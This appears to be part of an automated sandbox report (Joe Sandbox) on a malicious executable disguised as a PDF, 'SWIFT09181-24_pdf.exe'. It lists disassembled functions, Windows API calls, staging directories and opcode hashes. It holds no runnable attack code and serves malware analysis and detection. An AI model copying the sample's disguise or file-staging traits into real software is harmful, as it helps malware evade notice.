                                                                                                                                    • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 00405AC2
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                      • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,00000000,000000F0), ref: 00401645
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00401638
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                    • API String ID: 1892508949-2168965836
                                                                                                                                    • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                    • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                                    • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                    • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                      • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                    • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                    • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                    • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                    • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                                    • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                    • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(005DEC98), ref: 00401BA7
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                    • String ID: Call
                                                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                                                    • Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                    • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                                                                                                                                    • Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                    • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000463,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw967F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Enum$CloseOpenValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 167947723-0
                                                                                                                                    • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                    • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                                    • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                    • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000463,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw967F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                    • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                    • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                                    • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                    • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                    • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                                    • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                    • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                      • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                      • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                                      • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                    • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                                    • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                    • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                    • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                    • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                                    • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                    • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                    • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                    • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                    • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                                    • GetLastError.KERNEL32 ref: 00405714
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                    • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                                    • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                    • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                                    • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocErrorLastVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 497505419-0
                                                                                                                                    • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                    • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                    • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                    • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
